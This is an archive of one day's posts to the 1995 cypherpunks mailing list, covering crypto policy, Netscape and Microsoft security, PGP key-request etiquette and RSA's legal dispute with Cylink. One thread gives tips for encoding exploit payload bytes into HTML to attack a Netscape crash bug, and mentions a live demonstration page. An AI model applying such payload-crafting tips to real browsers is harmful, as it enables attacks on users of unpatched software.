Sep 28 08:52:03 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 28 Sep 95 08:52:03 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu> Message-ID: Is this the return of "Mosaic Communications" :-) From perry at piermont.com Thu Sep 28 08:54:04 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Sep 95 08:54:04 PDT Subject: european version of EFF/EPIC/etc? Message-ID: <199509281553.LAA21103@frankenstein.piermont.com> I was wondering if the Eurpeans had an equivalent of EPIC or EFF lobbying against crypto restrictions there, given the disturbing news a week or so ago. Perry From perry at piermont.com Thu Sep 28 08:59:15 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Sep 95 08:59:15 PDT Subject: european version of EFF/EPIC/etc? In-Reply-To: <199509281553.LAA21103@frankenstein.piermont.com> Message-ID: <199509281559.LAA21120@frankenstein.piermont.com> "Perry E. Metzger" writes: > I was wondering if the Eurpeans had an equivalent of EPIC or EFF I hate it when I type too fast. Obviously that isn't intended to be a new continent! > lobbying against crypto restrictions there, given the disturbing news > a week or so ago. > > Perry > From cjs at netcom.com Thu Sep 28 09:18:28 1995 From: cjs at netcom.com (cjs) Date: Thu, 28 Sep 95 09:18:28 PDT Subject: Simple Hardware RNG Idea Message-ID: <199509281615.JAA27355@netcom7.netcom.com> Hello all. Someone mentioned this on IRC last night, and it sounded like a really cool idea, so I thought I'd mention it. The idea is to generate random numbers using a geiger counter tube and a small portion of radioactive substance (like perhaps the stuff they use in smoke detectors?) Would that be random enough? I thought it was a neat idea anyway. Christopher From sameer at c2.org Thu Sep 28 09:26:05 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Sep 95 09:26:05 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <9509281050.AA15525@hplyot.obspm.fr> Message-ID: <199509281619.JAA24789@infinity.c2.org> > > No, you *can* put 0x22, 0x3e and 0x2f by using respectively > " > and / html constructs (&#nnn; nn decimal ascii code) > unfortunatly � is not recognized but you can probaly use any number > substracted by itself or even short lda#0 (depending on the cpu),...if > you need a zero,...(what for ?) Oh that's great.. netscape might -not- be doing the conversion before it crashes though.. worth a shot to check though, without a doubt. > > I hope this helps too, btw, anywone having contacts on the 8lgm folks? > they must have experience with that kind of stuff... Karl told me that it's their policy only to do exploits for bugs they have found themselves. > Even if a patch should be availble now, making a demonstration is > still interesting IMO [specially when you know that there are still > ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP > access packages!...] Look at http://www.c2.org/ with an unpatched netscape. Hopefully other sites will do similar things. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Thu Sep 28 09:26:20 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Sep 95 09:26:20 PDT Subject: STT_??? In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com> Message-ID: <199509281621.JAA24930@infinity.c2.org> > > Regarding Netscape, Mr. Dent of Microsoft said the > firm's security deficiencies that have recently come to > light have "tainted" electronic commerce on the > Internet. Mr. Dent also noted that Microsoft yesterday > introduced new security technology, including means to > verify a user's identity, that is much stronger than > Netscape's. Yeah. Right. I propose we show the world how Microsoft will respond to security problems. I should have a tentative web page up by later tonight. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tjic at OpenMarket.com Thu Sep 28 09:40:25 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Thu, 28 Sep 95 09:40:25 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters In-Reply-To: <9509280438.AA23997@cantina.verity.com> Message-ID: <199509281640.MAA20585@cranmore.openmarket.com> > Date: Wed, 27 Sep 1995 21:38:33 -0700 > From: patrick at Verity.COM (Patrick Horgan) > > > > > but the key was not there. Please mail me your key. Thank you. > > > > constructive suggestion as to how this mail could be changed > > to convey more information or to be less "threatening", please mail me. > > Sure, I found the above offensive. It comes across in exactly the same > tone as a cop saying, "Please step away from the car." Ack! ;) Not my intention at all, but a good observation... > The simple change: > > but the key was not there. Could you please mail me your key? Thanks. > > works miracles:) The tone on the rest of it was nice. You have to be careful > with imperatives. They usually sound mean...even with a please at the front. I got this letter in favor of some change in the wording, and a few letters saying "wording is fine as is". I assume that those who currently have no beef with the wording will not be offended by the added words, thus I have happilly integrated Patrick's suggestion. I have also added to the code a list of people who don't like receiving key-queries, added a test that gives an error if the user attempts to send a key-query to such an address, and made TCM's address the default value for the list. I have also added code to maintain a disk-based list of addresses that have already been mailed for a key, and added code that checks against this list before sending mail. I'll put this latest version of mail-secure.el (also upgraded to work with the latest version of mailcrypt (3.3)) on my web page with in a day or so. Until then, anyone who wants a copy can mail me. To those who sent polite suggestions: thank you. Your constructive criticism has helped make mail-secure.el a better tool. I encourage anyone else who has suggestions or comments to mail me. I try to be responsive to constructive input, as doing so helps the package improve, be accepted and get used. TJIC From sameer at c2.org Thu Sep 28 09:48:01 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Sep 95 09:48:01 PDT Subject: awards for hacking microsoft Message-ID: <199509281642.JAA26140@infinity.c2.org> I've been working on putting together my hack microsoft promotion and I need to think of a good low-budget award. T-shirts would not be economically feasible -- I expect to be awarding many microsoft awards.. Ideas would be appreciated. Thanks. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From WOOD at VAX2.ROCKHURST.EDU Thu Sep 28 09:50:44 1995 From: WOOD at VAX2.ROCKHURST.EDU (WOOD at VAX2.ROCKHURST.EDU) Date: Thu, 28 Sep 95 09:50:44 PDT Subject: [NOISE] Java Message-ID: <01HVT4585WLY000R2D@VAX2.ROCKHURST.EDU> > From: IN%"jya at pipeline.com" "John Young" 25-SEP-1995 15:29:30.33 > To: IN%"WOOD at VAX2.ROCKHURST.EDU" > CC: > Subj: JAV_jiv > > > The New York Times, September 25, 1995, pp. D1, D4. > > > > Sun is a maker of computers and software using the > industry-standard Unix software operating system and the > leading provider of so-called Internet server computers > that act as the gateway through which most people's desktop > computers actually send and receive data over the Net. > Figuring that what is good for the Internet is good for > Sun, the company now hopes to turn Java into an industry > standard by making it freely available to individuals and > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > universities, while licensing it to companies that > incorporate it into software products. > Does anyone know when or where Java is available? Many thanks, ------------------------------------------- | "Computers are boring and slow." | | | | David Wood | | Information Systems Specialist? | | wood at vax2.rockhurst.edu | ------------------------------------------- From AlanPugh at MAILSRV2.PCY.MCI.NET Thu Sep 28 10:06:43 1995 From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh) Date: Thu, 28 Sep 95 10:06:43 PDT Subject: sled corp Message-ID: <01HVT6WVKX368ZE7S0@MAILSRV1.PCY.MCI.NET> -----BEGIN PGP SIGNED MESSAGE----- Hello C-Punks, I recently found a company called "sled corp" at they are a white pages directory service (who i have absolutely no relationship with) that claims they will sign someone's pgp key for $20/year. to verify the identity of the person's key they are signing, they require either 1) a mailed or faxed copy of a driver's license, 2) mailed or faxed copy of a passport, or 3) a preprinted personal check (which cleared). i'm not sure how much i would trust this type of signature anyway, as all 3 of the above methods of identification can be easily forged, but i'd appreciate some comments by some of the folks out there that have considered the concept of key signatures. if anyone has had any dealings with this company, i would appreciate any comments on them. feel free to contact me privately if you'd like at either amp <0003701548 at mcimail.com> PGP Key = 4A2683C1 PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D September 28, 1995 12:58 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMGrUMCgP1O9KJoPBAQGVyQf/fAgOhopOQsWUqG2WiiUPNvW7pAmvkzC6 4zJwxWOduNyrROVPO+NKcJqn4aC7LrZU1qaqZsecBFfoNmGgXwiYLGp9NIVWSFLP uXdqo+RouDLJSkyWmjhrfYKP/4aN9JaNuesjudu03KDVwDMU2rks9KCHwvQzH6Ry pFez0YIApA4Y/PgTsq2D2msj4gnEQuXi3y+o28ic/rAtJxY6iPkvX2XJdEW+6KW8 RWp4rFfC6l3T5ccVJ4n6UjJ4wUZsHI93Z7hBdWGJQVaF1g5IQCdmTSCj1EWP/zzp YH/KcPwqaqjNEiECjCEXCuMEV2ZZPtN0jCXp6KFrIm/ZRzkC3I4SPg== =i2do -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Thu Sep 28 10:37:23 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Sep 95 10:37:23 PDT Subject: Prvasoft FAX Encryption Software Message-ID: <199509281737.KAA15710@ix8.ix.netcom.com> After the recent discussions of the Privasoft Fax Software and its proprietors' dislike of the Cryptographers' Inquisition :-), I wrote the author a neutral note discussing what I'm trying to accomplish for one of my customers, and asked about evaluation copies. He's put it on the Web at www.megasoft.com/privasoft/ ; it's "not crippleware", just limited number of uses. So anybody who wants to do some research into proprietary patented trade-secret products [_I_ didn't say Snake Oil in this posting :-)], there it is. His description of it sounds like it's got a reasonably friendly GUI, though I'm not sure that rates $130 when you can get fax software free with modems or really high-quality OCR-equipped fax software for less than that... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Thu Sep 28 10:37:25 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Sep 95 10:37:25 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit Message-ID: <199509281737.KAA15679@ix8.ix.netcom.com> At 10:40 AM 9/25/95 -0700, sameer wrote: > The really big sticking point I see, however, is the >certification authorities. There is a single point of failure here and >that is at Verisign. This becomes a large problem I think if the en >rypted email that Netscape does requires personal x509 certificates (I >read that Versign is issuing those for $9/each.) This is a problem >because for one thing I don't think Versign will want to issue certs >to psudonyms, and Netscape may not talk encrypted email to >non-certified people. (I am not sure) Verisign has a range of certificate types; a "Type I", which only promises that the userid is unique and is otherwise unverified, is free for non-commercial users and something like $6 for commercial; Types II and III require various levels of documentation and $$ to get. The www.verisign.com home page didn't exactly say how to get one; I gather the answer is "wait for October" or "Use the next Netscape version", where I'm don't remember if that's 1.2.2 or 2.0. Netscape is being modified to accept non-Verisign CAs, which means we _can_ build a web of trust to take advantage of it, using X.509 certs or a hybrid of X.509 and PGP. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Thu Sep 28 10:39:49 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Sep 95 10:39:49 PDT Subject: 25 Crays a Year to Break STT Message-ID: <199509281737.KAA15655@ix8.ix.netcom.com> > Microsoft said its Secure Transaction Technology (STT), was > designed to provide a much higher level of security for > credit card transactions on the Internet. Netscape's > general purpose encryption system uses a 40 or 128-bit > electronic "key", while STT will use 2,000-bit keys. Sigh. Apples and oranges, and they know it. .... > Although no encryption system was totally secure, Mr Dent > estimated it would take "25 Cray supercomputers a year" to > break the STT codes. So how much work can 25 Crays do in a year? Crack single-DES? Maybe RC4/64? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From todd at lgt.com Thu Sep 28 10:39:53 1995 From: todd at lgt.com (Todd Glassey) Date: Thu, 28 Sep 95 10:39:53 PDT Subject: FSTC - What is it... Message-ID: In answer to your question: I am not the official spokesperson for the organization. In fact I serve on a working group in an advisory and design review capacity. However I can tell you that: The Financial Services Technology Consortium (FSTC) is a consortium of financial services providers, national laboratories, universities, and government agencies who sponsor and participate in non-competitive collaborative research and development on interbank technical projects. The home page is located at http://www.llnl.gov/fstc and although still under construction offers pointers to a number of our projects like e-check and electronic-payment-handler as well as fraud-prevention tools and technologies. As to the actual posting of the wqebsite I just finished this yesterday so it will be listed pretty much in all the "cool places". a good point of contact for FSTC is: Dan.Schutzer at citicorp.com (Dan, please forgive me for giving the world your name!) I personally see FSTC as the strongest player in the secure e-commerce effort and would advise any banking and other financial services players (including the bond and stock houses) to get onto their bandwagon, yesterday... This leads me to believe that because of their Federal Involvement/Sponsership, that they will indeed become *the* defacto standards organization. As to the meetings planned they are scheduled for the ----------------------------------------------------- 10-Oct-95 E-Payment Working Group - Security Services, Cambridge Mass. 11-Oct-95 W3C meeting , Cambridge Mass. 26-Oct-95 E-Payment Working Group , General Meeting, Teaneck, NJ. Hope this answers your questions... Sincereley, Todd Glassey E-Payment Working Group Chief Technologist Looking Glass Technologies todd at lgt.com >This reached me via a couple of lists, so I hope I'm replying to the >right person: > > >>FYI- the FSTC E-payment Working Group meeting is happening at the W3 meeting >>on the day before the meeting itself. The meeting is being held at the OSF >>facilities. > >Did you send this note? Can you tell me a bit more about this -- >what's FSTC? > >Thanks! > >--Michael Smith > smithmi at dev.prodigy.com > > Support the Zimmerman legal defense! http://www.netresponse.com/zldf From tjic at OpenMarket.com Thu Sep 28 11:13:24 1995 From: tjic at OpenMarket.com (Travis Corcoran) Date: Thu, 28 Sep 95 11:13:24 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: <199509281813.OAA20769@cranmore.openmarket.com> -----BEGIN PGP SIGNED MESSAGE----- Message-Signature-Date: Thu Sep 28 14:13:09 1995 > To: cypherpunks at toad.com > From: tcmay at got.net (Timothy C. May) > > At 6:33 PM 9/27/95, Travis Corcoran wrote: > > What I call a robo-warning was this: > > " P.S. This mail was composed by my mailreading sftwr, which > automatically scans incoming mail, looking for failed keyserver > requests, and prompts me whether it should automatically send this msg > on my behalf. If there is a bug w this sftwr (for example, you never > PGP sign your msgs, so this entire msg makes no sense), or if you're > interested in the software itself (mail-secure.el: a package in lisp > for emacs; this is just one of the many crypto/privacy related things > it does) please mail the author of this package ( tjic at openmarket.com) > for details. Well, I still don't understand why you call a message that says 1) "I tried too verify a signature" 2) "please mail me your key" 3) "if there's a bug, please mail the author" a "warning". I guess we're just using the word "warning" differently... > As to whether I needed to respond to your robo-warning about how > your automatic scan of incoming mail produced some kind of > Signature Failure Condition Red at your end, I just ignored your > message. I never stated or implied that anyone "needed to" respond to query-mail. To the contrary, I said in all seriousness that ignoring query-mail was "a fine anarchistic solution to the problem". > As others will attest, when people ask me for my key in a > non-automated way, I usually send it to them. Well, I still don't understand your objection to labor-saving software any more than I understand the lifestyles of the Amish, but that's my problem, not anyone else's. > My _overall_ point was not to attack Travis C., who I don't think I > even mentioned by name, but to point out that great care must be > taken in running automated mail-response programs I did not take your comments on mail-secure.el as an attack on myself, but I did want to defend both the use of labor-saving software and parts of my particular implementation. Specifically, I defended the package against incorrect accusations on your part: 1) the query-mail was not a warning 2) the query-mail was not in response to the content of a post 3) the query-mail was not the first method used, but a last-ditch attempt 4) a human is in the loop 5) the keyserver used is not based on some trivial "preference" However, I do agree whole-heartedly with your above assertion that "great care must be taken in running automated mail-response programs". For this reason I have responded to your and other posts by adding features to the package to make it even less likely to bother people who don't want to be bothered. > Finally, since Travis is making a fairly big deal over my citing of > his post (though anonymously, as I recall), I'd like to see the > post he claims I signed. To the very best of my knowledge *I* did not send you a piece of mail requesting your key...I've had your key in my keyring for over a year. Further, I am not asserting that I saw a signed message from you any time recently. > >If anyone has a constructive suggestion as to how this mail could be > >changed to convey more information or to be less "threatening", please > >mail me. > > Simple, don't bother to ask in the first place. Or ask informally, in > ordinary English. Skip the "This mail was composed by my mailreading sftwr, > which automatically scans incoming mail, looking for failed keyserver > requests..." nonsense. Nonsense? It seems to me that the information is useful, for two reasons: (1) it alerts the recipient to the semi-automated nature of the mail, which allows the recipient to prioritize his response (if any) to it. (2) it alerts the recipient that incorrect receipt of a key-request could be caused by a software bug (as opposed to some attempt to forge email). (3) it notes the existance of the package, which the recipient might be interested in (in the same way many cryptography-aware programs add a comment line to a PGP-signature). By the way, I have had several people ask for a copy of mail-secure.el after receiving a key-request from the package, which translates into several more people encrypting their email and verifying the messages they receive. > I don't need some fraction of them running their own "key etiquette > agents" inspecting my posts for conformance to their preferences. Once again you're [ willfully ? ] missing the point: etiquette and preferences have nothing to do with it, and your repeated assertions to the contrary trivialize the desire of some people to authenticate messages they receive (which I and others consider to be a reasonable goal). - - -- TJIC (Travis J.I. Corcoran) http://www.openmarket.com/personal/tjic/ Member EFF, GOAL, NRA. opinions (TJIC) != opinions (employer (TJIC)) "Buy a rifle, encrypt your data, and wait for the Revolution!" PGP encrypted mail preferred. Ask me about gnuslive.el for emacs. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Auto-signed by mail-secure.el 1.002 using mailcrypt Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAwUBMGrlu4JYfGX+MQb5AQGiSwP+MMgoog/vmsxKU5Zo17L5ZE3KVlYWsbQ7 9kcVb8d2CLPyAyaU4iNmF5dLwdYyy0reft9jhzQAaZ/1Nm0+9KXGAhT7DdO2nDFT hGc9KiQ/IYEkkhkRJIRRNkVNGeWclbf9J/ffQUUNBBTBbJkjjwoLFns+GA6D2Qx/ xs8QFel7kvQ= =6Gyn -----END PGP SIGNATURE----- From cjl at welchlink.welch.jhu.edu Thu Sep 28 11:38:41 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Thu, 28 Sep 95 11:38:41 PDT Subject: awards for hacking microsoft In-Reply-To: <199509281642.JAA26140@infinity.c2.org> Message-ID: On Thu, 28 Sep 1995, sameer wrote: > I've been working on putting together my hack microsoft > promotion and I need to think of a good low-budget award. T-shirts > would not be economically feasible -- I expect to be awarding many > microsoft awards.. Ideas would be appreciated. Thanks. > What else, Chaum's Digicash. If you are unwilling to part with any of your own, perhaps you can collect contributions, or maybe the Digicash people will pony-up some extra cyberbucks for a good cause. After all, they are worth the paper they're printed on. :-) C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From baldwin at RSA.COM Thu Sep 28 12:03:44 1995 From: baldwin at RSA.COM (baldwin (Robert W. Baldwin)) Date: Thu, 28 Sep 95 12:03:44 PDT Subject: Q&A on the RSA/Cylink legal dispute Message-ID: <9508288123.AA812314973@snail.rsa.com> Here is RSA's Question & Answer sheet on the arbitration. It is available on our web site, www.rsa.com. --Bob ______________________________ Forward Header __________________________________ [RSALogo] --------------------------------------------------------------- Q&A ON THE RSA/CYLINK LEGAL DISPUTE This page contains general questions that have been brought up to us regarding the legal dispute between RSA and Cylink. We are providing these answers in hopes that you may better understand the issues. ---------------------------------------------------------------------------- September 25, 1995 Q. How did RSA's legal disputes with Cylink begin? A. It began in April of 1994 when Cylink filed an Arbitration Demand seeking to have a panel rule that Cylink was entitled to a retroactive patent license to RSA, also called the MIT patent. That was the extent of their Arbitration Demand at that time. The dispute was precipitated by RSA's discovery that Cylink had entered into a secret deal to provide products incorporating the patented MIT technology - even though Cylink knew it did not have a license. ------------------ Q. Why didn't PKP/RSA just sell them one? Isn't that their business? A. We offered them one several times. They wanted to pay essentially nothing for it. Although Cylink denied it, the fact that we offered them a license was confirmed by the Arbitrators in their ruling. ------------------ Q. Patents are routinely licensed and royalties routinely paid; why did Cylink go to the extraordinary length of suing RSA Data Security to obtain a license? A. We learned that in April of 1994 Cylink had won, over other bidders, a very substantial business deal with SWIFT (an international banking consortium) to provide X.25 encryption units for use by SWIFT on a worldwide basis. SWIFT had insisted that these products use the RSA patented technology for key management and authentication. Cylink had represented to SWIFT in their April 1994 contract that Cylink had a license to provide RSA technology. But they didn't. Cylink chose to sue us to win a retroactive license rather than simply admit what they had done and pay for a license. Cylink never informed us of their use of RSA or the representation to SWIFT. They never paid a penny to PKP or RSA for their unlicensed use of the RSA technology. They never even put any royalties aside. None of these facts are in dispute and are all a matter of public record. ------------------ Q. How did the litigation go beyond a limited Arbitration over a license? A. We didn't understand it at the time, but it's obvious now. While more claims and counterclaims were added to the Arbitration demand, Cylink knew of their SWIFT problem and other similar problems; we didn't. We believe that they were desperately trying to cover their unlicensed use of RSA by trying to litigate us into submission before it was discovered. It didn't work. ------------------ Q. What were the additional claims by each side? A. Charges were made by each RSA and Cylink that the other had breached the exclusive licensing authority of PKP among other wrongful acts. This brought a second set of issues for the Arbitrators. Finally, both parties asked to have PKP dissolved as we obviously could not continue as business partners; this was the third issue to be decided. It's quite clear in the Arbitration Panel's ruling that there were only three issues to be decided: (a) is Cylink entitled to a retroactive license to use RSA; (b) did either party breach the Partnership Agreement; and (c) should PKP be dissolved. The answers were no, no, and yes. ------------------ Q. If that's true, then how does Cylink claim that the Panel's ruling determined that RSA software customers are infringing the Stanford patents? A. The Arbitration Panel did not determine that the use of RSA software by RSA licensees or that the practice of RSA infringes the Stanford patents. It is most certainly true that the ruling was very limited; the Ruling itself starts out by stating the questions. The Panel did not, under any interpretation, rule on patent validity or determine that anyone was infringing. Cylink's claims to the contrary, along with their claims that somehow Cylink can rely on the Ruling to prove infringement is simply not true and ignores many other facts. ------------------ Q. What other facts? A. The Panel's ruling was very specific. Everything it said about third parties, including RSA customers who use software, refers to their need for patent licenses. If you bought software from RSA and RSA itself had the rights to make that software and license it to you, you don't need a separate patent license; rights to the patents came with the product. The Ruling also states, "RSA has a right to license its software." ------------------ Q. Under what circumstances would you need a separate patent license? A. If you want to make your own product -as opposed to buying one, such as RSA's software- you need a patent license. If you bought a software product but didn't use it, meaning you wrote your own, or re-wrote it, then you may need a separate patent license to do that. We believe the Panel was simply making it clear that just because you bought software from RSA, that fact alone doesn't mean you are free from the need for a separate patent license if you're not using the RSA software and making your own. You didn't get an explicit patent license with the software, you got rights under the patents as necessary to use the software. If you're using RSA's software -you didn't write your own- you don't need a separate patent license under either the MIT or Stanford patents. ------------------ Q. Are there other relevant facts that Cylink has ignored? A. Perhaps the most important fact that Cylink is carefully ignoring is that Cylink knows RSA did indeed have rights to make products under the MIT and Stanford patents. Cylink, for over five years, knowing full well what RSA sold and how, has not only referred customers to us, but in some cases where the customer was being cautious, Cylink confirmed to them in writing at their request that no separate patent licenses were necessary if they licensed RSA software. In other words, prospects of RSA's went to Cylink and said, "We're going to license this software from RSA. Do we need separate patent licenses from Cylink or PKP?" Cylink confirmed the answer - no. (And those companies then did in fact license our software. Cylink didn't turn around and sue them.) This alone should deter Cylink from bringing infringement suits against RSA customers. Nothing in the Panel's ruling changes any part of these facts. In fact, Cylink acknowledgment that RSA had such rights came out in the Arbitration proceeding itself. It's a matter of record. Cylink would also not like anyone to be aware that a suit was filed in Federal Court in 1994 to invalidate the Stanford patents, and that a ruling is due in December. ------------------ Q. How is RSA protecting its customers from action by Cylink? A. We have filed a Declaratory Relief Action in Federal Court. In that action, we have essentially said that Cylink is estopped -prevented- from taking action against anyone for infringing the Stanford patents for several reasons. The main reason is that companies who licensed software from RSA Data Security rather than "build their own" software do not need separate licenses to the MIT or Stanford patents. Since Cylink has confirmed this many times since 1990, they should not sue anyone for infringement. Another reason is that the Stanford patents are unenforceable and/or invalid. This action by RSA means that any suit brought by Cylink against anyone for infringement of the Stanford patents should be stopped until the resolution of the Declaratory Relief action, and Cylink will have to prevail on all the points above before they can assert any infringement. We have also indemnified our customers against claims such as those implicitly threatened by Cylink. RSA intends to stand behind these indemnity agreements fully. Anyone can bring a lawsuit for just about any reason. If Cylink tries to sue an RSA customer, RSA has both the determination and the resources to defend any such action. Read the Cylink press release carefully. Cylink huffs and puffs a lot, but is not directly threatening to sue anyone -that would mean they would be forced to fight the virtually impossible battle of prevailing on every point in our Declaratory Relief action- but instead are saying that buying a license can eliminate any risk. ------------------ Q. Has anyone else challenged the Stanford patents? A. A suit was filed in Federal Court last year by Roger Schlafly to invalidate the Stanford patents. A ruling is due in December. From what we've seen, Schlafly's claims raise disturbing questions about the Stanford patents. This whole business of the Stanford patents may be moot in a few months. There may be no risk - and no need to try to get any money back from Cylink. ------------------ Q. What will be the significance of PKP being dissolved? A. The most important change we see is that licenses to the MIT patent will be available for the first time in over five years without Cylink interference. * There is a tremendous amount of pent-up demand, and we are very busy filling it. Many of the largest companies in Europe, Asia, and the US are purchasing licenses to bring RSA-based products to market, including many low-cost chips and smart cards. We have already licensed a number of large and small companies that are bringing RSA-based electronic commerce, access control, and Internet security systems to market; we expect many, many more. ------------------ Q. Why can't RSA and Cylink simply settle their differences? A. That's a good question. The fact is that RSA recognizes this litigation is not beneficial to anyone and has offered to settle the dispute by granting Cylink a license to the MIT patent. Cylink has consistently overestimated the strength of its legal position and has refused all reasonable offers. Cylink now finds itself in the unenviable position of trying to sell its security products without RSA technology - which is the de facto industry standard. No amount of "spin doctoring" in press releases by Cylink changes that fact. ------------------ * During its existence from April of 1990 until September of this year, PKP could not grant any license without the approval of both partners. As a result of PKP's dissolution, the rights to the Stanford patents were returned to Cylink, and the exclusive right to license the MIT patent (RSA) was returned to RSA Data Security, Inc. Cylink currently has no rights to sell any products incorporating the MIT patented technology. ---------------------------------------------------------------------------- (C) 1995 RSA Data Security, Inc. All rights reserved. Permission granted for unlimited reproduction and distribution unmodified. From dl at hplyot.obspm.fr Thu Sep 28 12:37:29 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Thu, 28 Sep 95 12:37:29 PDT Subject: Anon Http web Proxy V2.1 Message-ID: <9509281922.AA18715@hplyot.obspm.fr> I fixed the IOs, it now works a lot faster, play with it on http://hplyot.obspm.fr:6661/ (no abuse plz) and get the source package on ftp://hplyot.obspm.fr/tcl/www/tclhttpdsh-0.4beta.tgz dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept smuggle FSF terrorist $400 million in gold nuclear Serbian Clinton From karn at qualcomm.com Thu Sep 28 13:17:47 1995 From: karn at qualcomm.com (Phil Karn) Date: Thu, 28 Sep 95 13:17:47 PDT Subject: Using sound cards to accelerate RSA? Message-ID: <199509282017.NAA20380@servo.qualcomm.com> >Somebody mentioned the possibility of using the a/d stage of a sound card >as a source of random bits, and that brought a thought back to mind: >given that a lot of sound cards are now shipping with DSP chips on board, >has anyone written any code that uses the cards DSP to accelerate RSA >processing? But most sound cards still don't have DSP chips. And modern general purpose CPUs are beginning to give them such a good run for their money that I wonder whether DSPs will ever become widespread. I'd stick with running RSA on the main CPU for now. Phil From asgaard at sos.sll.se Thu Sep 28 13:17:48 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 28 Sep 95 13:17:48 PDT Subject: "Notes" to be Eclipsed by "Netscape" In-Reply-To: <01BA8CD0.30988CA0@ploshin.tiac.net> Message-ID: Pete Loshin wrote: > >Timothy C. May wrote: > >(I've been saying for a while that the Web serves that purpose better, and > >that Web browsers will likely edge out Notes. Apparently I was hardly > >prescient, as Netscape recently bought Collabra, which is pushing that > >point exactly.) > > Notes uses replication to distribute data across networks; > there are better ways to have people compute remotely in my opinion > too (not sure WWW is THE answer, but it certainly is one of them). In an interview today in a Stockholm paper with a technical spokes- person for Hewlett-Packard (about the HP internal net with 19 worldwide connections to the Internet - by the way, allegedly no one has ever succeeded in breaking their firewalls) it was stated that Netscape was heavily used for HP internal business. Apparantly there was a choice between Notes and the internal Web, the Web being favoured 470:1. Mats From jcaldwel at iquest.net Thu Sep 28 13:35:32 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Thu, 28 Sep 95 13:35:32 PDT Subject: STT_??? Message-ID: On 28 Sep 95 at 8:08, John Young wrote: > 9-28-95. W$Japer: > > > "Infighting Unravels Alliance Seeking Standard to Protect > Internet Purchases." Money, money, money, MONEY! Let's hope Digital cash sans the Corprats takes... > The consortium brought together such top players as > credit-card rivals Visa International and MasterCard > International Inc., software titan Microsoft Corp. and > Internet upstart Netscape Communications Corp. But this > week, the alliance split because of tensions between > Visa and MasterCard and their respective technology > partners -- Microsoft and Netscape. Watch the vultures at Mirosoft come to feed: > Regarding Netscape, Mr. Dent of Microsoft said the > firm's security deficiencies that have recently come to > light have "tainted" electronic commerce on the > Internet. Mr. Dent also noted that Microsoft yesterday > introduced new security technology, including means to > verify a user's identity, that is much stronger than > Netscape's. From mab at crypto.com Thu Sep 28 13:44:09 1995 From: mab at crypto.com (Matt Blaze) Date: Thu, 28 Sep 95 13:44:09 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu> Message-ID: <199509282054.QAA26219@crypto.com> >This came across the SSL mailing list. Anyone know Taher's position >on key-escrow? Oh, come on. One does not have to "support key escrow" to be interested in Fortezza. The Fortezza interface does not have any "escrow-specific" features; it's actually a pretty good crypto API (for which several vendors plan to produce compliant, non-escrowed PCMCIA cards). The Fortezza market (in the government) is also pretty big, by the way, so one can hardly blame any vendor for being interested in in. Disclaimer: I'm also an evil "Fortezza sympathizer". I built a (Tessera, actually) version of CFS last year. I think it's a good interface, and I'd encourage people to build strong, non-escrowed crypto modules (in hardware and in software) that conform to it... -matt From dvw at hamachi.epr.com Thu Sep 28 13:51:15 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Thu, 28 Sep 95 13:51:15 PDT Subject: More on "Entropy" Message-ID: <306B0A5E@hamachi> Tom Weinstein wrote: >We used this formulation of entropy in Statistical Mechanics. It's >especially useful in Quantum Thermo where you can actually enumerate all >of the states instead of relying on probabilistic arguments. Sure, this formulation can be used. As a pedagogic tool for explaining what a theory is all about, many formulations are discussed as if they have application in real world situations. Of course (for pedagogic reasons), these 